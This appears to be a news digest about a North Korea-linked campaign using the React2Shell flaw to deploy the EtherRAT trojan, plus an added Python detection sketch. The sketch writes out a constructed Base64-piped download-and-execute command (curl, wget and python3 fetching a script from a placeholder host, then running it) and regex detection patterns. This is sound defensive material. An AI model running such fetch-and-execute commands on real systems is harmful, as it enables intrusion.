North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware
Briefly

"Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical security React2Shell flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT. "EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org," Sysdig said in a report published Monday."
"The cloud security firm said the activity exhibits significant overlap with a long-running campaign codenamed Contagious Interview, which has been observed leveraging the EtherHiding technique to distribute malware since February 2025. Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted through fake job interviews, coding assignments, and video assessments, leading to the deployment of malware."
"The attack chain commences with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant. The shell script is retrieved using a curl command, with wget and python3 used as fallbacks. It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, following which it writes to disk an encrypted blob and an obfuscated JavaScript dropper."
Operators linked to North Korea exploited the React2Shell (RSC) vulnerability CVE-2025-55182 to deploy EtherRAT, a previously undocumented remote access trojan. EtherRAT leverages Ethereum smart contracts for command-and-control resolution, implements five independent Linux persistence mechanisms, and downloads its own Node.js runtime. The activity overlaps with the Contagious Interview campaign, which targets blockchain and Web3 developers via fake job interviews, coding assignments, and video assessments and has used EtherHiding to distribute malware since February 2025. The attack chain executes a Base64-encoded shell command to fetch a shell script (curl with wget/python3 fallbacks) that downloads Node.js v20.10.0 and writes an encrypted blob and an obfuscated JavaScript dropper to disk.
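The delivery chain summarised above (an RSC exploit running a Base64-encoded shell command, a curl/wget/python3 download-and-execute stage, and a separate fetch of the Node.js runtime from nodejs.org) can be expressed as detection logic over process-execution telemetry. The following is an added example, not code from Sysdig, The Hacker News or the campaign it describes. It assumes EDR/auditd-style exec events with `pid`, `ppid`, `comm` and `cmdline` fields, assumes the React Server Components application runs under a `node` process, and uses constructed sample events with placeholder `example.invalid` URLs rather than real indicators.

```python
"""Detection sketch for a React2Shell -> EtherRAT style delivery chain.

Added example (not the report's own code). It scores constructed process-exec
telemetry for three behaviours the report describes:
  1. a web application runtime spawning a shell that pipes a Base64 blob
     into `base64 -d | sh`;
  2. the decoded command fetching a remote script with curl (wget / python3
     fallbacks) and handing it to a shell;
  3. a Node.js tarball fetched from nodejs.org beneath that web process,
     outside any package-manager or install-script ancestry.
Field names, the `node` parent assumption and all sample values are
assumptions made for this example.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Assumed process names for the web runtime and for legitimate installers.
WEB_RUNTIMES = {"node"}
PACKAGE_MANAGERS = {"apt", "apt-get", "dnf", "yum", "npm", "nvm", "pip", "pip3"}

# `echo <base64> | base64 -d | sh` style one-liners (40+ chars avoids tiny echos).
B64_PIPE_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{40,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
    r"\s*\|\s*(?:sh|bash)\b"
)
# Node.js distribution tarballs served from nodejs.org.
NODEJS_DL_RE = re.compile(r"https?://nodejs\.org/dist/\S+\.tar\.(?:xz|gz)")
DOWNLOADERS = ("curl ", "wget ", "urllib.request")

# Constructed stage-1 command, mirroring the curl -> wget -> python3 fallback
# order described in the report; the host name is a placeholder, not an IoC.
DECODED_STAGE1 = (
    "curl -fsSL http://stage.example.invalid/x.sh -o /tmp/.x.sh "
    "|| wget -q http://stage.example.invalid/x.sh -O /tmp/.x.sh "
    "|| python3 -c 'import urllib.request;urllib.request.urlretrieve("
    "\"http://stage.example.invalid/x.sh\",\"/tmp/.x.sh\")'; sh /tmp/.x.sh"
)
B64_STAGE1 = base64.b64encode(DECODED_STAGE1.encode()).decode()

# Constructed telemetry: one malicious chain under the app server plus benign noise.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "comm": "node", "cmdline": "node server.js"},
    {"pid": 101, "ppid": 100, "comm": "sh",
     "cmdline": f"sh -c 'echo {B64_STAGE1} | base64 -d | sh'"},
    {"pid": 102, "ppid": 101, "comm": "curl",
     "cmdline": "curl -fsSL http://stage.example.invalid/x.sh -o /tmp/.x.sh"},
    {"pid": 103, "ppid": 101, "comm": "sh", "cmdline": "sh /tmp/.x.sh"},
    {"pid": 104, "ppid": 103, "comm": "curl",
     "cmdline": "curl -fsSL https://nodejs.org/dist/v20.10.0/"
                "node-v20.10.0-linux-x64.tar.xz -o /tmp/.n.tar.xz"},
    {"pid": 200, "ppid": 1, "comm": "bash", "cmdline": "bash"},          # admin shell
    {"pid": 201, "ppid": 200, "comm": "apt", "cmdline": "apt install nodejs"},
]


def decode_b64_stage(cmdline: str) -> Optional[str]:
    """Return the decoded payload of an `echo ... | base64 -d | sh` one-liner."""
    m = B64_PIPE_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def is_download_and_execute(script: str) -> bool:
    """True when a script both fetches remote content and hands something to a shell."""
    fetches = any(tool in script for tool in DOWNLOADERS)
    executes = re.search(r"(?:\|\s*|;\s*|&&\s*)(?:sh|bash)\b", script) is not None
    return fetches and executes


def ancestry(events: List[Dict], pid: int) -> List[Dict]:
    """Walk parent links from `pid` upward; stops when the parent is unknown."""
    by_pid = {e["pid"]: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None:
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def analyze(events: List[Dict]) -> List[Dict]:
    """Emit one finding per suspicious exec event."""
    findings = []
    for ev in events:
        decoded = decode_b64_stage(ev["cmdline"])
        if decoded is not None:
            under_web = any(a["comm"] in WEB_RUNTIMES for a in ancestry(events, ev["ppid"]))
            findings.append({
                "pid": ev["pid"],
                "rule": "web_runtime_spawns_base64_shell" if under_web else "base64_shell",
                "download_and_execute": is_download_and_execute(decoded),
                "decoded": decoded,
            })
        if NODEJS_DL_RE.search(ev["cmdline"]):
            chain = ancestry(events, ev["ppid"])
            under_web = any(a["comm"] in WEB_RUNTIMES for a in chain)
            via_installer = any(a["comm"] in PACKAGE_MANAGERS for a in chain)
            if under_web and not via_installer:
                findings.append({"pid": ev["pid"],
                                 "rule": "nodejs_runtime_fetched_under_web_process"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["pid"], f["rule"], f.get("download_and_execute", ""))
```

Running the block prints two findings: the shell spawned by the `node` server that decodes and runs the Base64 stage (flagged as download-and-execute because the decoded text fetches a script and then runs `sh /tmp/.x.sh`), and the Node.js tarball fetch that sits under that same web process. The benign `apt install nodejs` event produces nothing, since it neither matches the nodejs.org tarball pattern nor descends from the application runtime.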
Read at The Hacker News